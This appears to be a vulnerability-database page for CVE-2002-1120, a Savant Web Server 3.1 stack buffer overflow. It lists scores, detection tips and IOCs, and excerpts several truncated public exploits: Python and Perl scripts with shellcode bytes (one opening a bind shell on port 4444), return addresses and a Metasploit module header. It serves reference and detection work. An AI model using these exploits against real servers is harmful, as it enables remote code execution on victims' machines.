CVE-2002-1120
published 2002-09-24CVE-2002-1120: Buffer overflow in Savant Web Server 3.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
PriorityP351high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
67.36%
99.2th percentile
Buffer overflow in Savant Web Server 3.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| savant | savant_web_server | <= 3.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x83\xc4\x50\x54\xc3
bytes↗
\x83\xc4\x8c\x54\xc3
- →Detect exploit attempts by inspecting HTTP method field for long binary/NOP sled content followed by a space and '/' — the exploit places shellcode in the HTTP method before the URI path separator. ↗
- →Flag HTTP requests where the method field contains high-entropy binary data or NOP sleds (0x90 sequences) — the exploit embeds shellcode in the HTTP method, not the URI. ↗
- →Savant server fingerprint string 'Savant/3.1' in HTTP Server response header identifies a vulnerable target; monitor for exploit probes against hosts returning this banner. ↗
- →Bytes 0x00, 0x0a, 0x0d, 0x25 are bad chars for the payload; exploit traffic will avoid these bytes in the overflow buffer — use this to tune IDS signatures. ↗
- →Characters in the range 0xe0–0xff placed before the '/' in the HTTP method are modified by Savant; exploit authors use safe NOP alternatives — look for unusual non-alpha bytes in the HTTP method field. ↗
- →Post-exploitation: monitor for unexpected outbound TCP connections or new listeners on port 4444 from the Savant web server process, indicating successful bind-shell payload execution. ↗
- →The exploit causes worker threads to die on each attempt; repeated HTTP requests that result in thread exhaustion (up to 10 threads in default install) against a Savant 3.1 server may indicate an active exploitation attempt. ↗
- ·The Metasploit module's Universal target RET address (0x00417a96) is a pop/ret gadget inside Savant.exe itself and is version-specific; other RET addresses target ws2help.dll and are OS/SP-specific. ↗
- ·Payload space is severely constrained (253 bytes); the Metasploit module recommends 'ord' (ordinal) payloads and uses a -3500 stack adjustment to locate the payload. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Savant Web Server 3.1 - Remote Overflow (Metasploit)
exploitdb·2010-10-04
CVE-2002-1120 Savant Web Server 3.1 - Remote Overflow (Metasploit)
Savant Web Server 3.1 - Remote Overflow (Metasploit)
---
##
# $Id: savant_31_overflow.rb 10546 2010-10-04 20:53:51Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /Savant\/3\.1/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Savant 3.1 Web Server Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service
supports a maximum of 10 threads (for a default install). Each exploit attempt
generally causes a thread to die
Exploit-DB
Savant Web Server 3.1 - Remote Buffer Overflow (3)
exploitdb·2009-12-14
CVE-2002-1120 Savant Web Server 3.1 - Remote Buffer Overflow (3)
Savant Web Server 3.1 - Remote Buffer Overflow (3)
---
#!/usr/bin/python
#Title: Savant web server 3.1 buffer overflow exploit
#Author: DouBle_Zer0
#Version: 3.1
#Tested on: win xp sp2,3 [en]
#Vulnerability discovered by Muts(offensive security)
#\x83\xc4\x50\x54\xc3 -add esp,50 push esp ret[see the double dance of this in exploit]
#ret=00401D09[pop ebp, ret]
import socket,sys
# win calc.exe [metasploit] (172 byte)
host = sys.argv[1]
buff = ("\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
"\x33\x44\xf9\
Exploit-DB
Savant Web Server 3.1 - GET Universal Remote Overflow
exploitdb·2007-08-12
CVE-2002-1120 Savant Web Server 3.1 - GET Universal Remote Overflow
Savant Web Server 3.1 - GET Universal Remote Overflow
---
#!/usr/bin/perl -w
# exploit for Savant webserver 3.1 remote bof
# shellcode bind 4444 port on target host
#
#
# Jacopo cervini aka [email protected]
#
use IO::Socket;
if(!($ARGV[1]))
{
print "Uso: savant-3.1.pl \n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "can't connect on $ARGV[0] sulla porta $ARGV[1]";
#Metasploit shellcode
$shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb5".
"\x55\x45\xd4\x83\xeb\xfc\xe2\xf4\x49\x3f\xae\x99\x5d\xac\xba\x2b".
"\x4a\x35\xce\xb8\x91\x71\xce\x91\x89\xde\x39\xd1\xcd\x54\xaa\x5f".
"\xfa\x4d\xce\x8b\x95\x54\xae\x9d\x3e\x61\xce\xd5\x5b\x64\x85\x4d".
"\x19\xd1\x85\xa0\xb2\x94\x8f\xd9\xb4\x97\xae\x20\x8e\x01\x6
Exploit-DB
Savant Web Server 3.1 - Remote Buffer Overflow (2)
exploitdb·2005-08-30
CVE-2002-1120 Savant Web Server 3.1 - Remote Buffer Overflow (2)
Savant Web Server 3.1 - Remote Buffer Overflow (2)
---
#!/usr/local/bin/perl
#
# Savant Buffer Overflow Exploit
# ----------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
# Vendor URL: http://savant.sourceforge.net
#
$ARGC=@ARGV;
if ($ARGC !=3) {
print "\nUsage: $0 [remote IP] [Port]\n";
print "Example: $0 127.0.0.1 80 1\n";
print "\nsystem:\n";
print " 1 - Windows 2000 SP4\n";
print " 2 - winXP sp1\n";
print "\n";
exit;
}
use Socket;
$x90 = "\x90"x13;
$pack_ret = pack('l', ($ret));
if($sistem==1){$ret = 0x77e14c29;} # Windows 2000 SP4
if($sistem==2){$ret = 0x77fb59cc;} # winXP sp1
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port =$ARGV[1];
$sistem = $ARGV[2];
print "\n";
print "[+] Con
Metasploit
Savant 3.1 Web Server Overflow
metasploit
Savant 3.1 Web Server Overflow
Savant 3.1 Web Server Overflow
This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt generally causes a thread to die whether successful or not. Therefore, in a default configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the "ord" payloads is recommended.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0112.htmlhttp://www.iss.net/security_center/static/10076.phphttp://www.securityfocus.com/bid/5686https://www.exploit-db.com/exploits/16770/http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0112.htmlhttp://www.iss.net/security_center/static/10076.phphttp://www.securityfocus.com/bid/5686https://www.exploit-db.com/exploits/16770/
2002-09-24
Published